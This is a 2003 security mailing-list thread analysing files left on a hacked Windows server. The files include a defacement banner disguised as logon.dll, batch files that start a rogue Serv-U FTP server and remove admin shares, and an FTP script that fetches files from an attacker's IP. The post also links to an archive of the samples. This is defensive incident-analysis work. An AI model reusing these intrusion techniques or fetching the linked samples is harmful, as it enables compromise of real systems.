Ok, just a quick note to everyone who's wondering about logon.dll. I noticed it was impossibly small (687 bytes, to be precise) and didn't have executable headers. So, I opened it in a text editor...this is what it says: <begin quote> \\ // (o o) ###+----oOO--(_)--OOo----+### || -=[ HacKd BY THALLIA ]=- || || -=[ Il est actuellement %TIME ]=- || || -=[ Vous κtes le %unow ιme connectι ]=- || || -=[ sur un total de %MaxUsers users ]=- || || -=[ Nombre d'users qui se sont deja connectιs %loggedInAll users ]=- || || -=[ Serveur on ligne depuis %Serverdays Days, %ServerHours Hours, %ServerMins Minutes, %ServerSecs Seconds ]=- || || -=[ La bande passante utilisιe actuellement est %ServerKBps ]=- || || -=[ Nonbre de Ko Up %ServerKbUp ]=- || || -=[ Nombre de Ko Dwl %ServerKbDown ]=- || <end quote> I saw that go2.bat makes a directory in c:\winnt\system32\spool\drivers\color\tmp\a and starts up serv-u FTP (5 times, apparently). "Log.txt" is used to report various statistics for "Guyver," which I am not familiar with but appears to be some kind of rogue FTP server system. Explorer.exe appears to be the ftp daemon itself. "Save.bat" does something very interesting...it removes all default administrative shares, which tends to make me think that this is how the machine was hacked in the first place; the hackers are just making sure nobody comes in behind them the same way. "1.txt" is an ftp script that pulls down log.txt, su.exe (which is also a serv-u daemon executable...interesting), and ServUDaemon.ini. It connects to an anonymous account on 65.26.36.203 (a RoadRunner cablemodem user IP) to retrieve these files. DWRCS is DameWare's remote control system, much like WinVNC. Are they sure this system was hacked by a former employee? They should be very, very careful before they go down that path, unless they have some significant information that points to him. It looks like they had either a vulnerable IIS install (based on logs contained in the RAR file) or default shares that got utilized, from what I've looked at. This is more likely a random hit than anything else. -----Original Message----- From: Nick Jacobsen [mailto:nickat_private] Sent: Thursday, April 03, 2003 3:43 PM To: incidentsat_private Subject: Re: Logon.dll? Possible root-kit? Ok here is link to a rar of the suspected files: http://www.ethicsdesign.com/HackLog.rar As some of you said, it looks like there is not a rootkit installed, and it looks like this was an attempt at making this box join a botnet. A kindly IRCOp has offered to both decompile the bot dll, and to remove the offending channel (#thallia), so that is taken care of. Anyway, I did manage to convince my clients that this was serious enough to warant a wipe of the data on the machine. I am waiting to see what your analysis of these files are. Thank You, Nick Jacobsen nickat_private ---------------------------------------------------------------------------- Powerful Anti-Spam Management and More... SurfControl E-mail Filter puts the brakes on spam, viruses and malicious code. Safeguard your business critical communications. Download a free 30-day trial: http://www.securityfocus.com/SurfControl-incidents ---------------------------------------------------------------------------- Powerful Anti-Spam Management and More... SurfControl E-mail Filter puts the brakes on spam, viruses and malicious code. Safeguard your business critical communications. Download a free 30-day trial: http://www.securityfocus.com/SurfControl-incidents
This archive was generated by hypermail 2b30 : Fri Apr 04 2003 - 16:44:06 PST